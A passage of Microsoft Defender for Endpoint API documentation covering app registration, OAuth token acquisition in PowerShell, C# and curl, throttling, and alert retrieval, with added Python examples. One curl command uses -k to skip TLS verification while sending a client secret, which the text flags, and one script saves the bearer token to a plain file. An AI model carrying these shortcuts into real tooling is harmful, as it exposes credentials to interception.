Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

To benefit from Microsoft Defender for Endpoint cloud app discovery signals, turn on Microsoft Defender for Cloud Apps integration.

Note

This feature will be available with an E5 license for Enterprise Mobility + Security on devices running Windows 10 and Windows 11.

Tip

See Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud Apps for detailed integration of Microsoft Defender for Endpoint with Microsoft Defender for Cloud Apps.

Enable Microsoft Defender for Cloud Apps in Microsoft Defender for Endpoint

1. In the navigation pane, select Preferences setup > Advanced features.
2. Select Microsoft Defender for Cloud Apps and switch the toggle to On.
3. Click Save preferences.

Once activated, Microsoft Defender for Endpoint will immediately start forwarding discovery signals to Defender for Cloud Apps.

View the data collected

To view and access Microsoft Defender for Endpoint data in Microsoft Defender for Cloud Apps, see Investigate devices in Defender for Cloud Apps.

For more information about cloud discovery, see Working with discovered apps.

If you're interested in trying Microsoft Defender for Cloud Apps, see Microsoft Defender
for Cloud Apps Trial .

Related topic
Microsoft Defender for Cloud Apps integration



Overview of management and APIs
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint supports a wide variety of options to ensure that customers can
easily adopt the platform.

Acknowledging that customer environments and structures can vary, Defender for
Endpoint was created with flexibility and granular control to fit varying customer
requirements.

Endpoint onboarding and portal access

Device onboarding is fully integrated into Microsoft Configuration Manager and Microsoft Intune for client devices and Microsoft Defender for server devices, providing a complete end-to-end experience of configuration, deployment, and monitoring. In addition, Microsoft Defender for Endpoint supports Group Policy and other third-party tools used for device management.

Defender for Endpoint provides fine-grained control over what users with access to the portal can see and do through the flexibility of role-based access control (RBAC). The RBAC model supports all flavors of security team structure:

Globally distributed organizations and security teams
Tiered model security operations teams
Fully segregated divisions with single centralized global security operations teams

Available APIs

The Microsoft Defender for Endpoint solution is built on top of an integration-ready platform.

Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs enable you to automate workflows and innovate based on Defender for Endpoint capabilities.

The Defender for Endpoint APIs can be grouped into three:

Microsoft Defender for Endpoint APIs
Raw data streaming API
SIEM integration

Microsoft Defender for Endpoint APIs

Defender for Endpoint offers a layered API model exposing data and capabilities in a structured, clear, and easy to use model, exposed through a standard Azure AD-based authentication and authorization model allowing access in the context of users or SaaS applications. The API model was designed to expose entities and capabilities in a consistent form.

Watch this video for a quick overview of Defender for Endpoint's APIs.
https://www.microsoft.com/en-us/videoplayer/embed/RE4d73M?postJsllMsg=true

The Investigation API exposes the richness of Defender for Endpoint: calculated or 'profiled' entities (for example, device, user, and file) and discrete events (for example, process creation and file creation) which typically describe a behavior related to an entity. It enables query-based access to this data through investigation interfaces. For more information, see Supported APIs.

The Response API exposes the ability to take actions in the service and on devices, enabling customers to ingest indicators, manage settings and alert status, and take response actions on devices programmatically, such as isolating devices from the network, quarantining files, and others.

Raw data streaming API

Defender for Endpoint raw data streaming API provides the ability for customers to ship real-time events and alerts from their instances as they occur within a single data stream, providing a low latency, high throughput delivery mechanism.

The Defender for Endpoint event information is pushed directly to Azure storage for
long-term data retention, or to Azure Event Hubs for consumption by visualization
services or additional data processing engines.

For more information, see Raw data streaming API.

The new Microsoft Defender XDR Streaming API includes email and alert events in
addition to device events. For more information, see Microsoft Defender XDR Streaming
API.

SIEM API

When you enable security information and event management (SIEM) integration, you can pull detections from Microsoft Defender XDR using your SIEM solution or by connecting directly to the detections REST API. Enabling it activates the SIEM connector access details section with pre-populated values, and an application is created under your Microsoft Entra tenant.

Related topics
Access the Microsoft Defender for Endpoint APIs
Supported APIs
Technical partner opportunities



Microsoft Defender for Endpoint API
release notes
Article • 01/19/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The following information lists the updates made to the Microsoft Defender for
Endpoint APIs and the dates they were made.

Release notes - newest to oldest (dd.mm.yyyy)

08.08.2022
Added new Export Device Health API method - GET /api/public/avdeviceshealth
Export device health methods and properties

06.10.2021
Added new Export assessment API method - Delta Export software vulnerabilities assessment (JSON response)
Export assessment methods and properties per device

25.05.2021
Added new API: Export assessment methods and properties per device.

03.05.2021
Added new API: Remediation activity methods and properties.

10.02.2021
Added new API: Batch update alerts.

25.01.2021
Updated rate limitations for Advanced Hunting API from 15 to 45 requests per minute.

21.01.2021
Added new API: Find devices by tag.
Added new API: Import Indicators.

03.01.2021
Updated Alert evidence: added detectionStatus, parentProcessFilePath and parentProcessFileName properties.
Updated Alert entity: added detectorId property.

15.12.2020
Updated Device entity: added IpInterfaces list. See List devices.

04.11.2020
Added new API: Set device value.
Updated Device entity: added deviceValue property.

01.09.2020
Added option to expand the Alert entity with its related Evidence. See List Alerts.

Microsoft Defender for Endpoint API
license and terms of use
Article • 01/18/2024

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender XDR

APIs

Defender for Endpoint APIs are governed by the Microsoft API License and Terms of use.

Throttling limits

Name                       Calls   Renewal period
API calls per connection   100     60 seconds
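A client that calls the API in bulk (for example, paging through alerts or pushing indicators) should stay under the 100 calls per 60-second renewal period stated above rather than waiting for the service to reject requests. The following sliding-window limiter is an added example, not Microsoft code; its design and the FakeClock used to exercise it without real waiting are assumptions, and the limit values are the ones from the table.

```python
"""Client-side throttle for the connection limit in the table above
(100 calls per 60-second renewal period).

Added example, not Microsoft code. The limiter design is an assumption chosen to
stay under the documented limit; clock and sleep are injectable so the
behaviour can be shown without actually waiting.
"""
import time
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `max_calls` calls in any `period` seconds; block otherwise."""

    def __init__(self, max_calls=100, period=60.0,
                 clock=time.monotonic, sleeper=time.sleep):
        self.max_calls = max_calls
        self.period = period
        self._clock = clock
        self._sleep = sleeper
        self._calls = deque()  # timestamps of calls still inside the window

    def _prune(self, now):
        # Drop timestamps that have aged out of the window.
        while self._calls and now - self._calls[0] >= self.period:
            self._calls.popleft()

    def acquire(self):
        """Wait until one more call fits in the window; return seconds waited."""
        now = self._clock()
        self._prune(now)
        waited = 0.0
        if len(self._calls) >= self.max_calls:
            # The oldest call leaves the window at calls[0] + period.
            waited = self._calls[0] + self.period - now
            self._sleep(waited)
            now = self._clock()
            self._prune(now)
        self._calls.append(now)
        return waited

    def in_window(self):
        return len(self._calls)


class FakeClock:
    """Deterministic clock (constructed for the demo): sleep advances time."""

    def __init__(self):
        self.now = 0.0

    def time(self):
        return self.now

    def sleep(self, seconds):
        self.now += seconds


def demo():
    """Burst 101 calls at t=0: the first 100 pass, the 101st waits a full period.

    Then advance 30 s and burst 100 more: only the call made at t=60 is still in
    the window, so 99 pass and the 100th waits until that call ages out.
    """
    clock = FakeClock()
    limiter = SlidingWindowLimiter(clock=clock.time, sleeper=clock.sleep)
    burst = [limiter.acquire() for _ in range(101)]
    clock.now += 30.0
    second = [limiter.acquire() for _ in range(100)]
    return burst, second, clock.now
```

Wrap each API call in `limiter.acquire()`; with the real `time.monotonic` and `time.sleep` defaults the caller simply blocks until the window has room. A sliding window is stricter than a fixed per-minute counter, which is the safe side when the service's renewal boundary is not known exactly.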

Legal Notices

Microsoft and any contributors grant you a license to the Microsoft documentation and other content in this repository under the Creative Commons Attribution 4.0 International Public License, see the LICENSE file.

Microsoft, Windows, Microsoft Azure and/or other Microsoft products and services referenced in the documentation may be either trademarks or registered trademarks of Microsoft in the United States and/or other countries. The licenses for this project do not grant you rights to use any Microsoft names, logos, or trademarks. Microsoft's general trademark guidelines can be found at https://go.microsoft.com/fwlink/p/?LinkID=254653.

Privacy information can be found at https://privacy.microsoft.com/.

Microsoft and any contributors reserve all other rights, whether under their respective copyrights, patents, or trademarks, whether by implication, estoppel or otherwise.

Access the Microsoft Defender for
Endpoint APIs
Article • 11/30/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs will enable you to automate workflows and innovate
based on Defender for Endpoint capabilities. The API access requires OAuth2.0
authentication. For more information, see OAuth 2.0 Authorization Code Flow.

Watch this video for a quick overview of Defender for Endpoint's APIs.
https://www.microsoft.com/en-us/videoplayer/embed/RE4d73M?postJsllMsg=true

In general, you'll need to take the following steps to use the APIs:

Create a Microsoft Entra application
Get an access token using this application
Use the token to access Defender for Endpoint API

You can access Defender for Endpoint API with Application Context or User Context.

Application Context: (Recommended)

Used by apps that run without a signed-in user present, for example, apps that run as background services or daemons.

Steps that need to be taken to access Defender for Endpoint API with application context:

1. Create a Microsoft Entra Web-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Create a key for this Application.
4. Get a token using the application with its key.
5. Use the token to access the Microsoft Defender for Endpoint API.

For more information, see Get access with application context.

User Context:

Used to perform actions in the API on behalf of a user.

Steps to take to access Defender for Endpoint API with user context:

1. Create a Microsoft Entra Native-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Get a token using the application with user credentials.
4. Use the token to access the Microsoft Defender for Endpoint API.

For more information, see Get access with user context.

Tip

When more than one query request is required to retrieve all the results, Microsoft Graph returns an @odata.nextLink property in the response that contains a URL to the next page of results. For more information, see Paging Microsoft Graph data in your app.

Related topics
Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint with application context
Access Microsoft Defender for Endpoint with user context



Microsoft Defender for Endpoint API -
Hello World
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com
Get Alerts using a simple PowerShell script

How long does it take to go through this example?

It only takes 5 minutes, done in two steps:

Application registration
Use examples: only requires copy/paste of a short PowerShell script

Do I need permission to connect?

For the Application registration stage, you must have a Global administrator role in your Microsoft Entra tenant.

Step 1 - Create an App in Microsoft Entra ID

1. Log on to Azure with your Global administrator user.
2. Navigate to Microsoft Entra ID > App registrations > New registration.
3. In the registration form, choose a name for your application and then click Register.
4. Allow your Application to access Defender for Endpoint and assign it 'Read all alerts' permission:

On your application page, click API Permissions > Add permission > APIs my organization uses > type WindowsDefenderATP and click on WindowsDefenderATP.

Note

WindowsDefenderATP does not appear in the original list. You need to start writing its name in the text box to see it appear.

Choose Application permissions > Alert.Read.All > Click on Add permissions.

Important

You need to select the relevant permissions. 'Read All Alerts' is only an example!

For example:
To run advanced queries, select 'Run advanced queries' permission.
To isolate a machine, select 'Isolate machine' permission.
To determine which permission you need, please look at the Permissions section in the API you are interested in calling.

5. Click Grant consent.

Note

Every time you add a permission, you must click on Grant consent for the new permission to take effect.

6. Add a secret to the application.

Click Certificates & secrets, add a description to the secret and click Add.

Important

After you click Add, copy the generated secret value. You won't be able to retrieve it after you leave!

7. Write down your application ID and your tenant ID.

On your application page, go to Overview and copy the following:

Done! You have successfully registered an application!

Step 2 - Get a token using the App and use this token to access the API.

Copy the script below to PowerShell ISE or to a text editor, and save it as Get-Token.ps1.

Running this script will generate a token and will save it in the working folder under the name Latest-token.txt.

PowerShell

# This code gets the App Context Token and saves it to a file named "Latest-token.txt" under the current directory.
# Paste below your Tenant ID, App ID and App Secret (App key).

$tenantId = '' ### Paste your tenant ID here
$appId = '' ### Paste your Application ID here
$appSecret = '' ### Paste your Application secret here

$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
$oAuthUri = "https://login.microsoftonline.com/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token

Sanity Check:

Run the script.
In your browser go to: https://jwt.ms/.
Copy the token (the content of the Latest-token.txt file).
Paste it in the top box.
Look for the "roles" section. Find the Alert.Read.All role.
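The same sanity check can be scripted so that a pipeline fails early when an app registration is missing the permission it needs. The following is an added example, not Microsoft's code: it base64url-decodes the JWT payload and inspects the roles and aud claims the way jwt.ms displays them. It does not verify the signature (the resource API does that on every request), so it is a diagnostic, not an authorization decision. The sample token is constructed and unsigned; the function names are assumptions.

```python
"""Inspect an access token's claims, as the jwt.ms sanity check above does.

Added example, not Microsoft code. The signature is NOT verified here; the
resource API performs that check. The sample token is constructed and unsigned.
"""
import base64
import json


def _b64url_decode(segment: str) -> bytes:
    padding = "=" * (-len(segment) % 4)          # JWT segments drop '=' padding
    return base64.urlsafe_b64decode(segment + padding)


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_claims(token: str) -> dict:
    """Return the payload claims of a compact JWS (header.payload.signature)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def has_role(token: str, role: str) -> bool:
    """True if the application permission `role` is present in the roles claim."""
    return role in decode_claims(token).get("roles", [])


def check_token(token: str, expected_audience: str, required_role: str) -> dict:
    """Report whether the token targets the API and carries the needed role."""
    claims = decode_claims(token)
    roles = list(claims.get("roles", []))
    return {
        "audience_ok": claims.get("aud") == expected_audience,
        "role_ok": required_role in roles,
        "roles": roles,
    }


def make_unsigned_sample_token(claims: dict) -> str:
    """Constructed, unsigned token for the demo (alg 'none', empty signature)."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}."


# Claims shaped like an app-context token for the Defender for Endpoint API.
SAMPLE_TOKEN = make_unsigned_sample_token({
    "aud": "https://api.securitycenter.microsoft.com",
    "roles": ["Alert.Read.All"],
    "appid": "00000000-0000-0000-0000-000000000000",   # placeholder app ID
})
```

Run `check_token` on the content of Latest-token.txt with the audience `https://api.securitycenter.microsoft.com` and the role you granted; `role_ok` being false after a permission change usually means Grant consent was not clicked again, which is the note above.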

Let's get the Alerts!

The script below will use Get-Token.ps1 to access the API and will get the past 48 hours' Alerts.

Save this script in the same folder you saved the previous script Get-Token.ps1.

The script creates two files (json and csv) with the data in the same folder as the scripts.

PowerShell

# Returns Alerts created in the past 48 hours.

# Run the script Get-Token.ps1 - make sure you are running this script from the same folder as Get-Token.ps1
$token = ./Get-Token.ps1

# Get Alerts from the last 48 hours. Make sure you have alerts in that time frame.
$dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")

# The URL contains the type of query and the time filter we created above
# Read more about [other query options and filters](get-alerts.md).
$url = "https://api.securitycenter.microsoft.com/api/alerts?`$filter=alertCreationTime ge $dateTime"

# Set the WebRequest headers
$headers = @{
    'Content-Type' = 'application/json'
    Accept = 'application/json'
    Authorization = "Bearer $token"
}

# Send the webrequest and get the results.
$response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -ErrorAction Stop

# Extract the alerts from the results.
$alerts = ($response.Content | ConvertFrom-Json).value | ConvertTo-Json

# Get a string with the execution time. We concatenate that string to the output file name to avoid overwriting the file
$dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":", "."}

# Save the result as json and as csv
$outputJsonPath = "./Latest Alerts $dateTimeForFileName.json"
$outputCsvPath = "./Latest Alerts $dateTimeForFileName.csv"

Out-File -FilePath $outputJsonPath -InputObject $alerts
($alerts | ConvertFrom-Json) | Export-CSV $outputCsvPath -NoTypeInformation

You're all done! You have just successfully:

Created and registered an application
Granted permission for that application to read alerts
Connected to the API
Used a PowerShell script to return alerts created in the past 48 hours
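For readers who automate from something other than PowerShell, the following is an added example (not Microsoft's code) that does what Get-Token.ps1 and the alert script above do: a client-credentials token request against the same token endpoint, the same $filter on alertCreationTime, JSON and CSV output, and, going beyond the scripts, following @odata.nextLink until the listing is exhausted, as the paging tip on the "Access the Microsoft Defender for Endpoint APIs" page describes. Assumptions: the HTTP transport is injected as a callable so the module runs offline against the constructed FakeDefenderApi, and the tenant, app ID and secret are placeholders; a real run would pass a transport built on urllib or requests and real values.

```python
"""Python counterpart of Get-Token.ps1 and the alert query above, with
@odata.nextLink paging. Added example; not Microsoft's code.

Assumptions: the token endpoint and resource URI are those the scripts use;
transport(method, url, headers, body) -> dict is injected so this runs offline
against the constructed FakeDefenderApi below.
"""
import csv
import io
import json
from datetime import datetime, timedelta, timezone
from urllib.parse import quote, urlencode

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/token"
RESOURCE = "https://api.securitycenter.microsoft.com"
ALERTS_URL = RESOURCE + "/api/alerts"


def token_request(tenant_id, app_id, app_secret):
    """Client-credentials grant, same fields as the PowerShell $authBody."""
    body = {"resource": RESOURCE, "client_id": app_id,
            "client_secret": app_secret, "grant_type": "client_credentials"}
    return TOKEN_URL.format(tenant=tenant_id), body


def get_token(transport, tenant_id, app_id, app_secret):
    url, body = token_request(tenant_id, app_id, app_secret)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return transport("POST", url, headers, urlencode(body))["access_token"]


def alerts_url(since):
    """Same OData $filter the script builds: alertCreationTime ge <UTC time>."""
    stamp = since.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{ALERTS_URL}?$filter={quote(f'alertCreationTime ge {stamp}')}"


def fetch_alerts(transport, token, since, max_pages=1000):
    """Collect every page: follow @odata.nextLink until the server omits it."""
    headers = {"Accept": "application/json", "Authorization": f"Bearer {token}"}
    url, alerts, pages = alerts_url(since), [], 0
    while url:
        if pages >= max_pages:  # guard against a nextLink loop
            raise RuntimeError("page limit exceeded")
        page = transport("GET", url, headers, None)
        alerts.extend(page.get("value", []))
        url = page.get("@odata.nextLink")
        pages += 1
    return alerts


def alerts_to_csv(alerts):
    """Flatten to CSV like Export-CSV; nested values are written as JSON text."""
    if not alerts:
        return ""
    fields = sorted({key for alert in alerts for key in alert})
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields, lineterminator="\n")
    writer.writeheader()
    for alert in alerts:
        writer.writerow({k: json.dumps(v) if isinstance(v, (dict, list)) else v
                         for k, v in alert.items()})
    return buf.getvalue()


class FakeDefenderApi:
    """Constructed stand-in: a token endpoint and a two-page alert listing."""

    def __init__(self):
        self.calls = []

    def __call__(self, method, url, headers, body):
        self.calls.append((method, url))
        if url.startswith("https://login.microsoftonline.com/"):
            return {"access_token": "constructed-token", "token_type": "Bearer"}
        if headers.get("Authorization") != "Bearer constructed-token":
            raise PermissionError("401: missing or wrong bearer token")
        if "$skiptoken=page2" in url:
            return {"value": [{"id": "a3", "severity": "Low", "status": "New"}]}
        return {"value": [{"id": "a1", "severity": "High", "status": "New",
                           "evidence": [{"sha1": "92cfceb39d57d914ed8b14d0e37643de0797ae56"}]},
                          {"id": "a2", "severity": "Medium", "status": "InProgress"}],
                "@odata.nextLink": f"{ALERTS_URL}?$skiptoken=page2"}


def run_sample(hours=48):
    """Token, then every alert from the last `hours` hours, as the scripts do."""
    api = FakeDefenderApi()
    token = get_token(api, "tenant-placeholder", "app-id-placeholder", "secret-placeholder")
    since = datetime.now(timezone.utc) - timedelta(hours=hours)
    alerts = fetch_alerts(api, token, since)
    return alerts, alerts_to_csv(alerts), len(api.calls)
```

The page cap in `fetch_alerts` is the one thing worth keeping when you swap in a real transport: a client that trusts @odata.nextLink unconditionally will spin forever if a proxy or a bug ever returns the same link twice.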

Related topic
Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint with application context
Access Microsoft Defender for Endpoint with user context



Create an app to access Microsoft
Defender for Endpoint without a user
Article • 11/30/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

This page describes how to create an application to get programmatic access to Defender for Endpoint without a user. If you need programmatic access to Defender for Endpoint on behalf of a user, see Get access with user context. If you are not sure which access you need, see Get started.

Microsoft Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will help you automate work flows and innovate based on Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.

In general, you'll need to take the following steps to use the APIs:

Create a Microsoft Entra application.
Get an access token using this application.
Use the token to access Defender for Endpoint API.

This article explains how to create a Microsoft Entra application, get an access token to
Microsoft Defender for Endpoint, and validate the token.

Create an app

1. Log on to Azure with a user that has the Global Administrator role.
2. Navigate to Microsoft Entra ID > App registrations > New registration.
3. In the registration form, choose a name for your application, and then select Register.
4. To enable your app to access Defender for Endpoint and assign it 'Read all alerts' permission, on your application page, select API Permissions > Add permission > APIs my organization uses, type WindowsDefenderATP, and then select WindowsDefenderATP.

Note

WindowsDefenderATP does not appear in the original list. Start writing its name in the text box to see it appear.

Select Application permissions > Alert.Read.All, and then select Add permissions.

You need to select the relevant permissions. 'Read All Alerts' is only an example. For example:

To run advanced queries, select the 'Run advanced queries' permission.
To isolate a device, select the 'Isolate machine' permission.
To determine which permission you need, look at the Permissions section in the API you are interested in calling.

5. Select Grant consent.

Note

Every time you add a permission, you must select Grant consent for the new permission to take effect.

6. To add a secret to the application, select Certificates & secrets, add a description to the secret, and then select Add.

Note

After you select Add, copy the generated secret value. You won't be able to retrieve this value after you leave.

7. Write down your application ID and your tenant ID. On your application page, go to Overview and copy the following.

8. For Microsoft Defender for Endpoint Partners only. Set your app to be multi-tenanted (available in all tenants after consent). This is required for third-party apps (for example, if you create an app that is intended to run in multiple customers' tenants). This is not required if you create a service that you want to run in your tenant only (for example, if you create an application for your own usage that will only interact with your own data). To set your app to be multi-tenanted:

Go to Authentication, and add https://portal.azure.com as the Redirect URI.
On the bottom of the page, under Supported account types, select the Accounts in any organizational directory application consent for your multi-tenant app.

You need your application to be approved in each tenant where you intend to use it. This is because your application interacts with Defender for Endpoint on behalf of your customer.

You (or your customer if you are writing a third-party app) need to select the consent link and approve your app. The consent should be done with a user who has administrative privileges in Active Directory.

The consent link is formed as follows:

https

https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true

Where 00000000-0000-0000-0000-000000000000 is replaced with your application ID.

Done! You have successfully registered an application! See examples below for token acquisition and validation.

Get an access token

For more information on Microsoft Entra tokens, see the Microsoft Entra tutorial.

Use PowerShell

PowerShell

# This script acquires the App Context Token and stores it in the variable
# $token for later use in the script.
# Paste your Tenant ID, App ID, and App Secret (App key) into the indicated
# quotes below.

$tenantId = '' ### Paste your tenant ID here
$appId = '' ### Paste your Application ID here
$appSecret = '' ### Paste your Application key here
$sourceAppIdUri = 'https://api.securitycenter.microsoft.com/.default'
$oAuthUri = "https://login.microsoftonline.com/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    scope = "$sourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
$token

Use C#

The following code was tested with NuGet Microsoft.Identity.Client 3.19.8.

Important

The Microsoft.IdentityModel.Clients.ActiveDirectory NuGet package and Azure
AD Authentication Library (ADAL) have been deprecated. No new features have
been added since June 30, 2020. We strongly encourage you to upgrade; see the
migration guide for more details.

1. Create a new console application.

2. Install NuGet Microsoft.Identity.Client.

3. Add the following:

C#

using System.Collections.Generic; // for List<string> in the snippet below
using Microsoft.Identity.Client;

4. Copy and paste the following code in your app (don't forget to update the three
variables: tenantId, appId, appSecret):

C#

string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
const string authority = "https://login.microsoftonline.com";
const string audience = "https://api.securitycenter.microsoft.com";

IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder
    .Create(appId)
    .WithClientSecret(appSecret)
    .WithAuthority($"{authority}/{tenantId}")
    .Build();

List<string> scopes = new List<string>() { $"{audience}/.default" };

AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();

string token = authResult.AccessToken;

Use Python
See Get token using Python.

Use Curl

Note

The following procedure assumes that Curl for Windows is already installed on your
computer.

1. Open a command prompt, and set CLIENT_ID to your Azure application ID.

2. Set CLIENT_SECRET to your Azure application secret.

3. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your app
to access Defender for Endpoint.

4. Run the following command:

Console

curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k

The trailing -k switch tells curl to skip TLS certificate verification; drop it for
anything other than a quick local test, because without verification an intercepting
proxy could read the client secret and the returned token.

You will get an answer in the following form:

Console

{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}

Validate the token


Ensure that you got the correct token:

1. Copy and paste the token you got in the previous step into JWT in order to
decode it.

2. Validate that you get a 'roles' claim with the desired permissions.

In the following image, you can see a decoded token acquired from an app with
permissions to all of Microsoft Defender for Endpoint's roles:

Use the token to access Microsoft Defender for Endpoint API

1. Choose the API you want to use. For more information, see Supported Defender
for Endpoint APIs.
2. Set the authorization header in the HTTP request you send to "Bearer {token}"
(Bearer is the authorization scheme).
3. The expiration time of the token is one hour. You can send more than one request
with the same token.

The following is an example of sending a request to get a list of alerts using C#:

C#

using System.Net.Http;
using System.Net.Http.Headers;

var httpClient = new HttpClient();

var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");

request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);

var response = httpClient.SendAsync(request).GetAwaiter().GetResult();

// Do something useful with the response

See also
Supported Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint on behalf of a user

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Use Microsoft Defender for Endpoint APIs
Article • 11/30/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

This page describes how to create an application to get programmatic access to
Defender for Endpoint on behalf of a user.

If you need programmatic access to Microsoft Defender for Endpoint without a user, refer
to Access Microsoft Defender for Endpoint with application context.

If you are not sure which access you need, read the Introduction page.

Microsoft Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs will enable you to automate workflows and innovate
based on Microsoft Defender for Endpoint capabilities. The API access requires
OAuth 2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.

In general, you'll need to take the following steps to use the APIs:

Create a Microsoft Entra application
Get an access token using this application
Use the token to access Defender for Endpoint API

This page explains how to create a Microsoft Entra application, get an access token to
Microsoft Defender for Endpoint and validate the token.

Note

When accessing Microsoft Defender for Endpoint API on behalf of a user, you will
need the correct Application permission and user permission. If you are not familiar
with user permissions on Microsoft Defender for Endpoint, see Manage portal
access using role-based access control.

Tip

If you have the permission to perform an action in the portal, you have the
permission to perform the action in the API.

Create an app

1. Log on to Azure with a user account that has the Global Administrator role.

2. Navigate to Microsoft Entra ID > App registrations > New registration.

3. When the Register an application page appears, enter your application's
registration information:

Name - Enter a meaningful application name that will be displayed to users
of the app.

Supported account types - Select which accounts you would like your
application to support. The options are:

Accounts in this organizational directory only - Select this option if you're
building a line-of-business (LOB) application. This option is not available if
you're not registering the application in a directory. This option maps to
Microsoft Entra-only single-tenant. This is the default option unless you're
registering the app outside of a directory. In cases where the app is
registered outside of a directory, the default is Microsoft Entra multi-tenant
and personal Microsoft accounts.

Accounts in any organizational directory - Select this option if you would
like to target all business and educational customers. This option maps to
Microsoft Entra-only multi-tenant. If you registered the app as Microsoft
Entra-only single-tenant, you can update it to be Microsoft Entra multi-tenant
and back to single-tenant through the Authentication blade.

Accounts in any organizational directory and personal Microsoft accounts -
Select this option to target the widest set of customers. This option maps to
Microsoft Entra multi-tenant and personal Microsoft accounts. If you
registered the app as Microsoft Entra multi-tenant and personal Microsoft
accounts, you cannot change this in the UI. Instead, you must use the
